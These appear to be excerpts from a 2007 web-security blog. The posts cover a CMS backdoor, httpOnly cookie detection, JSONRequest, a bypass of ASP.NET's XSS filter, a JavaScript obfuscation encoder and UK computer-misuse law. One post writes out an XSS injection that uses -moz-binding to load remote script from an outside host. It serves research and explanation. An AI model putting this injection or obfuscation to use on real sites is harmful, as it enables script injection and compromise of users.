Languages and Literature, English, Jekyll

Martin Paul Eve


As the title says, heise Security have found a backdoor in the Artmedic CMS system. The interesting question is how this backdoor was implanted. Giving the benefit of the doubt, it's possible that the development server was compromised and the code injected (the changes date back to the 2nd of May), but on the other hand the developer's not responding to heise's emails could be indicative of something more sinister.


Admittedly of limited use, here is a JavaScript function I wrote to detect the presence of httpOnly cookies. In Firefox the function will overwrite the real value of the cookie, so before using this function it is vital to try and read the cookie normally! Here is the script embedded in a test PHP page.


A proposed extension to the currently supported set of ...Request objects is JSONRequest, interesting from a security point of view because the proponents of the project wish to allow JSONRequest to violate the Same Origin Policy. This post will give a brief overview of the security features touted by JSONRequest and of how they potentially could allow an attacker to compromise a site more effectively.


Many sites use JavaScript methods to inject a hidden form field into 404 pages to trace the original page that points to the invalid link. An example of this can be found at http://www.yaldex.com/FSPageDetails/_404Referrer.htm. The attentive observer will spot that this method of writing the field injects the HTTP referrer directly into the page without any sanitization. So what?


ASP.NET comes preloaded with some default XSS protection which is actually pretty nifty. However, it turns out that the system can be circumvented by a variety of methods, as illustrated by this test input:

Turns out that IE will still process attributes on closing tags, which circumvents the filter for <a, whilst also treating /**/ as a null comment but obviously breaking .NET's filter regex.


Here is a nice tool for encoding JavaScript into eval(String.fromCharCode(x,x,x)) format. A full HTML page is listed here, or you can try it out live at the bottom of this post.

JavaScript eval String.fromCharCode encoder was originally published by Martin Paul Eve at Martin Paul Eve on May 15, 2007.


Today I wrote a simple tool to illustrate the binding of a JavaScript document to a page using Firefox's XBL support (-moz-binding) in an XSS context. The process works as follows: Inject attributes as follows (different encodings may be necessary): <element style = "-moz-binding:url('http://site.com/STXSS_XBL.xml#loader');" />. Browser loads XBL document.


pdp has an interesting post from last month about amendments to the British Computer Misuse Act that specify the illegality of "making, supplying or obtaining articles for use in computer misuse offences". Time to make a "terms and conditions" for this site. Amendments to the British Computer Misuse Act was originally published by Martin Paul Eve at Martin Paul Eve on May 15, 2007.